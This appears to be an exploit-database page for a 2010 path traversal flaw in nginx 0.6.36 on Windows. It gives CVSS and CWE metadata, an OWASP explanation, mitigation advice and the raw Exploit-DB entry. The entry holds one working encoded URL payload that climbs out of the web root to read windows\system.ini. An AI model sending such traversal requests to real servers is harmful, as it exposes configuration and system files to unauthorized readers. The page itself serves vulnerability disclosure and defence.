header-logo
Suggest Exploit
vendor:
nginx [engine x] http server
by:
cp77fk4r
8,8
CVSS
HIGH
Path Traversal
22
CWE
Product Name: nginx [engine x] http server
Affected Version From: <= 0.6.36
Affected Version To: <= 0.6.36
Patch Exists: YES
Related CWE: N/A
CPE: nginx:nginx
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win32
2010

nginx [engine x] http server <= 0.6.36 Path Draversal

A Path Traversal attack aims to access files and directories that are stored outside the web root folder. By browsing the application, the attacker looks for absolute links to files stored on the web server. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration and critical system files, limited by system operational access control. The attacker uses “../” sequences to move up to root directory, thus permitting navigation through the file system.

Mitigation:

Ensure that user input is validated and filtered to prevent path traversal attacks. Use a whitelist of accepted inputs to prevent malicious input from being accepted. Ensure that the web server is configured to deny access to files outside of the web root directory.
Source

Exploit-DB raw data:

# Exploit Title: nginx [engine x] http server <= 0.6.36 Path Draversal
# Date: 20/05/10
# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | www.DigitalWhisper.co.il
# Software Link: http://nginx.org/
# Version: <= 0.6.36
# Tested on: Win32
#
##[Path Traversal:]
A Path Traversal attack aims to access files and directories that are stored
outside the web root folder. By browsing the application, the attacker looks
for absolute links to files stored on the web server. By manipulating
variables that reference files with “dot-dot-slash (../)” sequences and its
variations, it may be possible to access arbitrary files and directories
stored on file system, including application source code, configuration and
critical system files, limited by system operational access control. The
attacker uses “../” sequences to move up to root directory, thus permitting
navigation through the file system. (OWASP)
#
http://localhost/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem.ini
#
#
[e0f]

Navigation

Suggest Exploit

Services By CQR